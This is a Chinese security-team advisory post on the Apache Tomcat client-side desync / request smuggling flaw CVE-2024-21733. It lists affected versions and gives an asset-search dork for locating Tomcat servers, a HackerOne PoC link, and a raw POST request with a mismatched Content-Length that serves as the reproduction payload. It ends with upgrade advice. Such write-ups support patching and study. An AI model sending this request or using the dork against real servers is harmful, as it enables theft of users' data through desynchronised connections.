本文属于OneTS安全团队成员98的原创文章,转载请声明出处!本文章仅用于学习交流使用,因利用此文信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,OneTS安全团队及文章作者不为此承担任何责任。
Tomcat介绍
Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。但是,不能将Tomcat和Apache HTTP服务器混淆,Apache HTTP服务器是用C语言实现的HTTPWeb服务器;这两个HTTP web server不是捆绑在一起的。Apache Tomcat包含了配置管理工具,也可以通过编辑XML格式的配置文件来进行配置。
漏洞描述
Apache Tomcat 8.5.7 至 8.5.63、9.0.0-M11 至 9.0.43 版本容易受到客户端同步取消攻击。
当 Web 服务器无法正确处理 POST 请求的 Content-Length 时,就会发生客户端同步 (CSD) 漏洞。通过利用此漏洞,攻击者可以强制受害者的浏览器取消与网站的连接同步,从而导致敏感数据从服务器、客户端连接中请求走私。
漏洞影响版本
8.5.7 <= Tomcat<= 8.5.63
9.0.0-M11 <= Tomcat <= 9.0.43
资产测绘平台Dork
title
==
"Apache Tomcat"
漏洞复现
POC地址
https://hackerone.com/reports/2327341
POST
/
HTTP/1.1
Host
: hostname
Sec-Ch-Ua
: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile
: ?0
Sec-Ch-Ua-Platform
: "Linux"
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site
: none
Sec-Fetch-Mode
: navigate
Sec-Fetch-User
: ?1
Sec-Fetch-Dest
: document
Accept-Encoding
: gzip, deflate, br
Accept-Language
: en-US,en;q=0.9
Priority
: u=0, i
Connection
: keep-alive
Content-Length
: 6
Content-Type
: application/x-www-form-urlencoded
X
漏洞修复建议
升级Tomcat到8.5.64或9.0.44以上版本
原文始发于微信公众号(JC的安全之路):Tomcat请求走私(CVE-2024-21733)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论